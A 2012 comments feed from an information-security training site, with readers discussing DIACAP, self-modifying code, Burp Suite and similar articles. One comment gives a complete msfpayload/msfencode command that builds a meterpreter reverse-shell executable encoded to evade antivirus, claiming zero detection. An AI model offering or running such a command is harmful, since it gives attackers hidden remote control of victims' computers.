Comments for InfoSec Institute - IT Training and Information Security Resources

Comment on Writing Self-Modifying Code Part 3: Antivirus Evasion by Iain

Iain — Thu, 02 Feb 2012 18:50:33 +0000

Yes Andrew, I’ve just replied to your email. I suppose the Scottish spelling of Iain (with the second “I”) is a little unusual!

Comment on Goodbye DIACAP, Hello DIARMF by Steve L

Steve L — Thu, 02 Feb 2012 17:43:26 +0000

Someone mentioned that DIACAP was suppose to streamline and reduce the administrative overhead of C&A. The couple of places I have worked took DIACAP and twisted it into some mutant form of DITSCAP. Old habits are hard to break, especially in the government.

Comment on Writing Self-Modifying Code Part 3: Antivirus Evasion by Andrew

Andrew — Wed, 01 Feb 2012 22:24:48 +0000

also @Iain – I just sent you a mail if it’s the same Iain I was talking to before…just so we don’t get into a comment area discussion.

Comment on Writing Self-Modifying Code Part 3: Antivirus Evasion by Andrew

Andrew — Wed, 01 Feb 2012 22:02:27 +0000

It’s reasonably complex until you get used to it. Realasset is where you are looking if you want the the close to final product stuff. I used subfolders instead of a bunch of git commits so I didn’t have to explain reversion in git. Win some, lose some, I guess.

On audio volume, I used an okay mic to get rid of some background noise. It seemed louder in the original mp3 and seemed to lose some volume when re-encoded to AAC. I can throw the original mp3s on github if it’s a problem for people.

Comment on CISSP Domain – Cryptography and Security by Ola

Ola — Wed, 01 Feb 2012 19:22:16 +0000

This is an excellent summary of the cryptography domain.

Comment on Writing Self-Modifying Code Part 3: Antivirus Evasion by Iain

Iain — Wed, 01 Feb 2012 11:58:38 +0000

Thank you for posting the third in this series. Unfortunately, the sound volume is low so I’m sure I will have to watch the video several times. I’m also confused by all the various sources in the subfolders but I hope that will become clear in due course.

It is a very complicated subject, isn’t it?!

Comment on HTTP Response Splitting Attack by Arvind

Arvind — Tue, 31 Jan 2012 15:57:10 +0000

Thanks…glad you feel it was helpful.

Comment on Writing Self-Modifying Code Part 2: Using extended assembly – Practice by Andrew

Andrew — Tue, 31 Jan 2012 06:41:09 +0000

@Pellucida – if you haven’t seen already, part 3 is up

Comment on Burp Suite Walkthrough by Prateek

Prateek — Mon, 30 Jan 2012 04:26:57 +0000

Hi Praveen,

Sorry for the late reply, i was travelling. owasp.org is a very good website for learning about web application security. I recommend that you read their documentation about various topics. You can download the application DVWA and test your skills on it. You can then move on to testing your skills on vulnerable VM’s like websecdojo. securitytube.net is a very good resource for watching web app sec videos. Also just search for owasp on youtube and you will find a ton of interesting videos..

Hope this helps !

Comment on Rock Solid: Will Digital Forensics Crack SSD’s? by Jean Moulin

Jean Moulin — Sat, 28 Jan 2012 10:33:34 +0000

Good news.

At least for those of us who don’t believe that binary numbers on a calculating machine are a valid reason to kidnap and torture people for years on end.

Comment on Goodbye DIACAP, Hello DIARMF by Stacey Demick

Stacey Demick — Sat, 28 Jan 2012 04:06:26 +0000

Recently the DIACAP KS (Knowledge Service) opened up its doors to a wider audience of CAC holders to include DoD contractors. KS has pertinent information and checklists to streamline the administrative burden of mapping the 800-53r3 to the traditional 8500-2 controls.

Comment on How to Bypass an Antivirus by Iacopo C.

Iacopo C. — Sat, 28 Jan 2012 01:18:01 +0000

Hi Irfan,
the correct command for msfpayload | msfencode is:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 R | msfencode -c 1 -e x86/shikata_ga_nai > Desktop/meterpreter_1.exe

NO THIS:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X | msfencode -c 1 -e x86/shikata_ga_nai > Desktop/meterpreter_1.exe

For this you have 0% on virus scan!

Comment on Goodbye DIACAP, Hello DIARMF by David S.

David S. — Fri, 27 Jan 2012 15:08:31 +0000

Unfortunately (because of the inevitability not their comments) I have to agree with OutSourceThis and RiffRaff. Security practitioners will be forced to spend more of their time producing reports or managing systems to provide them – taking time and effort away from the actual defense of their networks. DIACAP was intended to reduce the administrative burden of certifying networks and it failed because what started as a streamlined process turned into an unmanageable hydra of bureaucracy. DIACAP also worked on a three-year cycle. Now, with DIARMF you talking about an 18 month cycle where controls will need to be reviewed incessantly in order to ensure they meet ever-changing requirements. It’s tuff to hit a moving target and it doesn’t look as though DIARMF will reduce the bureaucracy either. The direct-hired IT workforce can’t keep up with requirements as it is. This will create an even greater dependence on contracted services and drive up the total cost of system management in already shrinking IT budgets.

I know — “there you go with the negative vibes” — it’s just the way *I* see it.

Comment on IT Auditing Fundamentals – Theoretical to Practical by T.Pasha

T.Pasha — Fri, 27 Jan 2012 03:01:04 +0000

Very informative article. I need regular input from you.

Comment on Risk Management – Chapter 2 by Tom Olzak

Tom Olzak — Thu, 26 Jan 2012 23:16:23 +0000

I can… send a request to my email and I’ll get it right out

Comment on Risk Management – Chapter 2 by Tom Olzak

Tom Olzak — Thu, 26 Jan 2012 23:15:39 +0000

I can… send a request to my email and I’ll get it right out

Comment on Goodbye DIACAP, Hello DIARMF by George Johnson

George Johnson — Thu, 26 Jan 2012 15:29:43 +0000

Thanks for the write up. I didn’t catch a timeline for the rollout for the DIARMF to be implemented. Would you know of one? Also, we have been down this road before with the ICD 503 “stuff”. And also as well and as you have indicated in your article the release of this framework is just the beginning as every subordinate command seems duty bound to put their own form of branding on the framework (just muddies up the water) so we will have to wait on those regs to come out as well. I would like to be able to tell my dev team and our customer that we have a solid IA course of action and not be underminded by this new stuff every other year.

Comment on Goodbye DIACAP, Hello DIARMF by RiffRaff

RiffRaff — Thu, 26 Jan 2012 15:27:18 +0000

Just think of it as job security.

Comment on IT Auditing Fundamentals – Theoretical to Practical by ubaiyadullah

ubaiyadullah — Thu, 26 Jan 2012 05:51:07 +0000

HI irfan it was really help me lot such a great article from thanks a lot ….

Comment on iPhone Espionage by AlfredoC

AlfredoC — Wed, 25 Jan 2012 19:02:01 +0000

I guess 2 lessons to be learned here:
1. Stay away from jail-broken phones!
2. If you do, bring your own charger!

Nice detailed article, for wannabe hackers?
Good work though.